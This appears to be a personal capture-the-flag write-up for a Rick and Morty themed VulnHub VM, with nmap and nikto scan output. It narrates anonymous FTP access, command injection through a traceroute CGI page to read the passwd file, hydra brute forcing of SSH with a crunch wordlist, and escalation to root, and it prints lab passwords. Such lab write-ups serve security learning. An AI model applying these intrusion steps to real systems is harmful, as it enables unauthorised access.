Back again with another vulnhub challenge, this time with a rick and morty themed one. The description of the challenge states that there are 130 points worth of flags and that you should also get root, so I presume you’ll need root to get the last flag.Being a fan of the show, I felt that I had to beat this one, so lets get started.
As per usual, lets fire up nmap and scan the VM.
Nmap scan
# Nmap 7.60 scan initiated Tue Nov 7 02:28:55 2017 as: nmap -p- -sSVC -O -oA nmap 192.168.1.36
Nmap scan report for 192.168.1.36
Host is up (0.00032s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r–r– 1 0 0 42 Aug 22 05:10 FLAG.txt
|_drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.35
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 – secure, fast, stable
|_End of status
22/tcp open ssh?
| fingerprint-strings:
| NULL:
|_ Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp open http Apache httpd 2.4.27 ((Fedora))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty’s Website
9090/tcp open http Cockpit web service
|_http-title: Did not follow redirect to https://192.168.1.36:9090/
13337/tcp open unknown
| fingerprint-strings:
| NULL:
|_ FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open ssh OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
| 256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_ 256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (EdDSA)
60000/tcp open unknown
| fingerprint-strings:
| NULL, ibm-db2:
|_ Welcome to Ricks half baked reverse shell…
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.60%I=7%D=11/7%Time=5A0178AF%P=x86_64-pc-linux-gnu%r(NULL
SF:,42,”Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x204\.4
SF:\.0-31-generic\x20x86_64\)\n”);
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.60%I=7%D=11/7%Time=5A0178AF%P=x86_64-pc-linux-gnu%r(N
SF:ULL,29,”FLAG:{TheyFoundMyBackDoorMorty}-10Points\n”);
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.60%I=7%D=11/7%Time=5A0178B5%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2F,”Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.
SF:\.\n#\x20″)%r(ibm-db2,2F,”Welcome\x20to\x20Ricks\x20half\x20baked\x20re
SF:verse\x20shell\.\.\.\n#\x20″);
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 7 04:11:54 2017 — 1 IP address (1 host up) scanned in 6180.25 seconds
Looking through the output, the first flag is right there for you.
FLAG:{TheyFoundMyBackDoorMorty}-10Points (10/130).
There’s also a backdoor on port 60000 and a proxy on port 9090, I’ll save these for later.
A visit to the website hosted on the VM gave a simple webpage. Downloaded the image and checked the source code for some clues but found nothing.
So lets take a look at the proxy site.
Sweet that makes it flag 2 (20/130). Poked around a bit more, but found nothing.
Moving on, I fired up enum4linux which gave me nothing but nikto found some interesting directories and files.
– Nikto v2.1.6/2.1.5
+ Target Host: 192.168.1.36
+ Target Port: 80
+ GET Server leaks inodes via ETags, header found with file /, fields: 0x146 0x557458caf66e2
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OPTIONS Allowed HTTP Methods: GET, POST, OPTIONS, HEAD, TRACE
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: GET /passwords/: Directory indexing found.
+ OSVDB-3092: GET /passwords/: This might be interesting…
+ OSVDB-3268: GET /icons/: Directory indexing found.
+ OSVDB-3233: GET /icons/README: Apache default file found.
Hhhhmmmm, I wonder whats’ in the password directory?
Diving into the FLAG.txt file gives us:
That makes 30/130 points. Going back and looking at the password.html source produced my next clue. Hidden in the source was the password winter, possibly a login for morty?
Searched around a bit more, then decided to go over my nmap scan again to see what else is open. FTP, SSH and the reverse shell. Lets go with FTP first as anonymous login is enabled.
Downloading the FLAG.txt file to my machine gave me the flag:
making it 40/130 points.
Before attacking the ssh file I decided to go after the reverse shell.
That another flag, 50/130 points.
Tried to ssh as morty into the server and kept getting denied, so decided to look around for some usernames and came across the robots.txt file.
Looked at root_sheel.cgi page gave me nothing.
However the tracertool.cgi page definitely gave me something. Since it takes in an ip address and executes a traceroute. This means the page could be vulnerable to command injection and
boom, passwd file. Here we have a couple of users to try and ssh with now, Morty, Summer and RickSanchez.
Logged in as Summer, tried using cat on the flag, but the creator decided to troll us and give us ascii art instead (not that I’m mad).
So back to using the head command and flag 60/130.
Searching around, found some interesting files in the directories for Morty and RickSanchez. Ended up downloading them to my pc to inspect them and do what I need to do.
Started off with mortys’ directory. The Safe_Password.jpg file seems interesting, exiftool found nothing but strings came through with.
Extracting the journal with the password, gave me a text file.
Flag points 80/130. The journal mentions something about a safe and that the password is 131333. Checking out ricks directory and I find two other folders, RICKS_SAFE and ThisDoesntContainAnyFlags. Naturally, I go after the ThisDoesntContainAnyFlags directory and behold, he was right:
Basically got trolled.
Now on to the safe, I couldn’t execute it on my computer, so ssh back in and copied it into Summers directory. Run the file and I get rolled again. Run the file for the second time with the password as an argument:
Now on 100/130 points. The file states something about ricks password being 1 upper case and 1 number plus one of the words from his old band. Turns out rick was in a band, Flesh Curtains. Using crunch to generate the password files and hydra to bruteforce ssh with the username RickSanchez.
Password: P7Curtains.
Now ssh into the machine as RickSanchez. Lets see what rights rick has:
He has all the rights. Switch to root user and boom, final flag 130/130 points.
Overall, really liked this CTF and actually learnt something (this person must really like rick and morty to know rick was in a band). Hope we get more in the future which are more challenging.
main 